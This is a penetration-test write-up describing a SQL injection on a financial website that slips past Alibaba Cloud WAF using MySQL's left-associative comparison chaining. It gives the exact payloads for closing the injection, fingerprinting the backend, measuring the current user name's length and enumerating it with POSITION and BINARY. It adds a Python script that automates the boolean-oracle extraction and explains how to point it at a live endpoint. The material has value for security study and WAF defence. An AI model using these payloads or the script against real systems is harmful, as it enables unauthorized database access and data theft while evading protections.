Bypassing Alibaba Cloud WAF on a Financial Site via MySQL Chain Comparison
During an authorized penetration test of a financial institution's website protected by Alibaba Cloud WAF, the author found a SQL injection point, used MySQL's left-associative comparison chaining ("chain comparison") to close the injection with a payload the WAF let through, fingerprinted the backend as MySQL, and built boolean-based payloads around LENGTH and POSITION (with BINARY for case-sensitive matching) to extract the current database user name character by character.
Background
During an authorized penetration test of a financial website protected by Alibaba Cloud WAF, a query endpoint was found to be vulnerable to SQL injection.
Discovery Process
Sending the parameter with 1 or 3 single quotes produced an error or a 302 redirect, while 2 or 4 quotes returned HTTP 200 with data: an odd number of quotes leaves the string literal unterminated and breaks the query, an even number keeps it balanced. That confirmed the value is spliced into the SQL statement unescaped.
Simple payloads were blocked by the WAF.
Closing the Injection and DB Type Identification
Appending '=1='1 to the original value closed the injection and returned the normal result set. In MySQL the = operator is left-associative and every comparison evaluates to 0 or 1, so WHERE col = 'value'=1='1' parses as ((col = 'value') = 1) = '1', which is still a valid condition. Oracle does not allow a comparison result to be used as a value in another comparison and PostgreSQL has no implicit boolean-to-integer conversion, so both reject the construct; a normal response therefore also fingerprints the backend as MySQL.
The payload '=0='1 returned no data: for the record the original comparison matched, ((1) = 0) = '1' evaluates to 0 and the row is filtered out. The endpoint thus behaves as a boolean oracle, answering true (1) or false (0) depending on the injected expression.
Payload Construction and Boolean Logic
The author explains that MySQL treats the integer 1 as TRUE and 0 as FALSE, and that the string '1' is coerced to the number 1 when compared with an integer. For a row the original comparison matched, the chain ((col = 'value') = X) = '1' reduces to X = 1: '=1='1 yields true and the server returns the full result set, while '=0='1 yields false and returns no rows. Rows the original comparison did not match see the opposite outcome (their chain reduces to X = 0), so a dependable oracle checks whether the known record is present in the response rather than whether any rows came back at all.
Extracting Current User Length
Injecting '=10-(length(current_user))='1 returned data, which means 10 - LENGTH(current_user) evaluated to 1, i.e. the user name is 9 characters long. The same payload with 11 (11 - 9 = 2, so the chain compares 1 with 2 and is false) returned no data, confirming the length.
Enumerating the Full Username
POSITION(substr IN str) returns the 1-based index of the first occurrence of substr in str, or 0 when it is absent. The payload '=POSITION('x'+IN+current_user)='1 (the + signs are URL-encoded spaces) returned data, so POSITION evaluated to 1 and the character "x" is at position 1 of the user name. Because the default collation compares case-insensitively, the author added the BINARY keyword to force a byte-wise, case-sensitive match (since MySQL 8.0.27 BINARY is deprecated in favour of CAST(... AS BINARY)).
By iterating over the alphabet and extending the already recovered prefix by one guessed character per round, with payloads of the form '=POSITION(BINARY '<prefix><guess>'+IN+current_user)='1, and keeping the guess whose payload yields a true result, each character of current_user was recovered step by step. Extending the prefix is what makes this work: POSITION reports where the whole substring first occurs, so a hit at position 1 for prefix plus guess pins down exactly the next character.
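The whole procedure above, closing the injection with the comparison chain, the '=1='1 / '=0='1 oracle, the length probe and the prefix-extending POSITION enumeration, as an added Python example that is not part of the original write-up. The table, the column name acct_no, the lookup value ACC001 and the user fin_app@% are constructed; MySQLChainSimulator stands in for the real backend by applying MySQL's left-associative 0/1 comparison semantics to the three payload shapes the example sends, and oracle() is the function one would replace with an HTTP request to the vulnerable endpoint. It goes one step beyond the page: the oracle tests for the known record rather than for "any rows", because rows the original comparison did not match are returned exactly when the injected expression is 0.

```python
"""Boolean-based extraction through MySQL's left-associative comparison chain.

Added example, not code from the original write-up.  The table, the column
acct_no, the lookup value ACC001 and the user fin_app@% are constructed;
MySQLChainSimulator stands in for a real MySQL backend.
"""
import re
import string


class MySQLChainSimulator:
    """Evaluates  WHERE acct_no = 'LOOKUP'<payload>  the way MySQL does for a
    payload of the form  '=<expr>='1 : '=' is left-associative, every
    comparison yields 0 or 1, and the string '1' is coerced to the number 1:
        ((acct_no = 'LOOKUP') = <expr>) = '1'
    """

    # constructed rows: exactly one matches the lookup value the tester knows
    ROWS = [("ACC001", "alice"), ("ACC002", "bob"), ("ACC003", "carol")]
    CURRENT_USER = "fin_app@%"   # constructed, 9 characters like the page's target

    _INT_RE = re.compile(r"^'=(-?\d+)='1$")
    _LEN_RE = re.compile(r"^'=(\d+)-\(length\(current_user\)\)='1$")
    _POS_RE = re.compile(r"^'=POSITION\(BINARY '([^']*)' IN current_user\)='1$")

    def _expr_value(self, payload):
        """Value of <expr> for the three payload shapes this example sends."""
        if m := self._LEN_RE.match(payload):
            return int(m.group(1)) - len(self.CURRENT_USER)
        if m := self._POS_RE.match(payload):
            # POSITION is 1-based and returns 0 when the substring is absent
            return self.CURRENT_USER.find(m.group(1)) + 1
        if m := self._INT_RE.match(payload):
            return int(m.group(1))
        raise ValueError("simulator only understands the three probe shapes")

    def query(self, lookup, payload):
        expr = self._expr_value(payload)
        rows = []
        for acct_no, owner in self.ROWS:
            original = int(acct_no == lookup)   # (acct_no = 'LOOKUP')  -> 0/1
            chained = int(original == expr)     # (...) = <expr>        -> 0/1
            if chained == 1:                    # (...) = '1', '1' coerced to 1
                rows.append((acct_no, owner))
        return rows


KNOWN = "ACC001"   # a lookup value that normally returns one record


def oracle(sim, payload):
    """True iff the known record survives the injected chain.  Keying on the
    known record matters: rows the original comparison did not match come
    back exactly when <expr> is 0, so "any data returned" is not a safe test."""
    return any(acct == KNOWN for acct, _ in sim.query(KNOWN, payload))


def find_length(sim, max_len=64):
    """'=N-(length(current_user))='1 keeps the known record iff N - len == 1."""
    for n in range(2, max_len + 2):
        if oracle(sim, f"'={n}-(length(current_user))='1"):
            return n - 1
    return None


def extract_user(sim, alphabet=string.ascii_letters + string.digits + "_@%.-"):
    """Grow the recovered prefix one character at a time.  POSITION reports
    where the whole substring first occurs, so a hit at position 1 for
    prefix + guess fixes the next character; BINARY makes it case-sensitive."""
    length = find_length(sim)
    if length is None:
        raise RuntimeError("could not determine length(current_user)")
    prefix = ""
    while len(prefix) < length:
        for ch in alphabet:
            guess = prefix + ch
            if oracle(sim, f"'=POSITION(BINARY '{guess}' IN current_user)='1"):
                prefix = guess
                break
        else:
            raise RuntimeError(f"no character in the alphabet follows {prefix!r}")
    return prefix


if __name__ == "__main__":
    sim = MySQLChainSimulator()
    print("'=1='1 ->", sim.query(KNOWN, "'=1='1"))   # the known record only
    print("'=0='1 ->", sim.query(KNOWN, "'=0='1"))   # the other rows instead
    print("length ->", find_length(sim))
    print("current_user ->", extract_user(sim))
```

Against a real target, oracle() would issue the request with the known lookup value plus the payload and check that the known record is in the body; the payload strings are exactly the ones sent (URL-encode the spaces as + in the query string).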
Conclusion
The attack relied on a rarely used MySQL parsing property, the left-associative comparison chain, to build boolean-based payloads that passed Alibaba Cloud WAF. That was enough to close the injection, fingerprint the backend as MySQL, and extract the current database user name one character at a time without triggering the WAF.
Black & White Path